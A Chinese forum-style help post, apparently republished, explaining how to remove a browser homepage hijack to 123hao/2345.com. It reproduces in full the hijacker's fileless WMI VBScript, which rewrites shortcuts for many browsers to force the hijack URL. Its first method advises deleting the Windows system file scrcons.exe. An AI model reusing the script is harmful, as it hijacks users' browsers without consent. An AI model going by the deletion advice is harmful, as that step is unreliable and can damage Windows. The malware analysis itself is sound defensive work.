方法一
下载360卫士,然后使用其主页劫持工具,可以恢复,但是还没结束,如果这是你高高兴兴地删除360,等第二次打开电脑时,又会出现主页被可恶的123hao劫持的情况,彻底解决问题的办法是,在C:\Windows\System32\wbem\scrcons.exe这个文件中,找到删除scrcons.exe这个文件,他才是罪大恶极的祸端,然后你会发现删除不了,这是还是我们伟大的360卫士来帮忙,打开360卫士的文件粉碎机,把找到的scrcons.exe直接拖进去,OK,123hao劫持主页完美解决,可以感谢并删除360卫士了
方法二
考虑到可能加载了启动项,在注册表、启动项、服务等中均未查找到相关信息,重启后IE快捷方式被重新篡改。尝试了事件查看器和任务计划,均未在里面查出任何信息。
之后又安装了超级兔子、360、exterminateit等工具进行检查,也未检出。打开ProcessMonitor进行监视,发现每隔30分钟出现一个scrcons.exe进程自动启动并修改快速启动栏的命令,然后自动关闭(幸亏是30分钟一次,你要是24小时一次,那我就杯具了…),修改Win7下opera快速启动图标路径类似如下:C:\Users\iefans\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\UserPinned\TaskBar\Opera12.01 1532.lnk 查找资料,发现这应该是一个通过WMI发起的定时自动运行脚本。要查看WMI事件,到以下地址下载WMITool并安装
http://www.microsoft.com/en-us/download/details.aspx?id=24045 安装后打开WMI event viewer,点击左上角register for events,弹出Connect to namespace框,填入“root\subscription”,确定,出现下图:
点击左侧_EventFilter:Name="unown_filter",再至右侧右键点击ActiveScriptEventConsume r Name="unown",选择view instant properties,如下图:
查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上“
http://www.2345.com/?kunown”!抓住你了~!隐藏的够深,没常驻进程,没有文件(把自己存储在WMI数据库中)。 受到影响的浏览器有(各色浏览器,差不多齐了):"IEXPLORE.EXE", "chrome.exe", "firefox.exe","360chrome.exe", "360SE.exe","SogouExplorer.exe", "opera.exe", "Safari.exe","Maxthon.exe", "TTraveler.exe", "TheWorld.exe","baidubrowser.exe", "liebao.exe", "QQBrowser.exe"具体代码如下:On Error Resume Next:Const link = "
http://www.2345.com/?kunown":browsers =Array("IEXPLORE.EXE", "chrome.exe","firefox.exe", "360chrome.exe", "360SE.exe","SogouExplorer.exe", "opera.exe", "Safari.exe","Maxthon.exe", "TTraveler.exe", "TheWorld.exe","baidubrowser.exe", "liebao.exe", "QQBrowser.exe"):SetoDic = CreateObject("scripting.dictionary"):For Each browser Inbrowsers:oDic.Add LCase(browser), browser:Next:Set fso =CreateObject("Scripting.Filesystemobject"):Set WshShell =CreateObject("Wscript.Shell"):strDesktop ="C:\Users\Gemini\Desktop":strAllUsersDesktop =WshShell.SpecialFolders("AllUsersDesktop"):QuickLaunch = "C:\Users\Gemini\AppData\Roaming\Microsoft\InternetExplorer\Quick Launch":UserPinnedStartMenu = QuickLaunch & "\UserPinned\StartMenu":UserPinnedTaskBar = QuickLaunch & "\UserPinned\TaskBar":For Each file In fso.GetFolder(strDesktop).Files:IfLCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink =WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name =fso.GetBaseName(path) & "." & fso.GetExtensionName(path):IfoDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.AttributesAnd 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:EndIf:End If:Next:For Each file In fso.GetFolder(strAllUsersDesktop).Files:IfLCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink =WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name =fso.GetBaseName(path) & "." & fso.GetExtensionName(path):IfoDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.AttributesAnd 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:EndIf:End If:Next:If fso.FolderExists(QuickLaunch) Then:For Each file Infso.GetFolder(QuickLaunch).Files:If LCase(fso.GetExtensionName(file.Path)) ="lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path =oShellLink.TargetPath:name = fso.GetBaseName(path) & "." &fso.GetExtensionName(path):If oDic.Exists(LCase(name))Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes= file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Iffso.FolderExists(UserPinnedStartMenu) Then:For Each file Infso.GetFolder(UserPinnedStartMenu).Files:IfLCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink =WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name =fso.GetBaseName(path) & "." & fso.GetExtensionName(path):IfoDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.AttributesAnd 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:EndIf:End If:Next:End If:If fso.FolderExists(UserPinnedTaskBar) Then:For Each fileIn fso.GetFolder(UserPinnedTaskBar).Files:IfLCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink =WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name =fso.GetBaseName(path) & "." & fso.GetExtensionName(path):IfoDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.AttributesAnd 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:EndIf:End If:Next:End If
最后,清除方法:在WMI event viewer中将“_EventFilter:Name="unown_filter"”项目右键删除!删不掉? 到WMITool安装路径(例如:C:\Program Files(x86)\WMI Tools)下,右键点击wbemeventviewer.exe,选择以管理员身份运行!删之!还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的
http://www.2345.com/?kunown去掉! 暂时就这么多了,还有没有其它影响的话,用用再看吧!解决方法来自:Gemini
希望大家能够把这解决方法普及开来,现在大多人还是用修改快捷方式之类的解决方案,已经落伍了...
原文出处:
http://www.iefans.net/ie-zhuye-jiechi-www-2345-com-kunown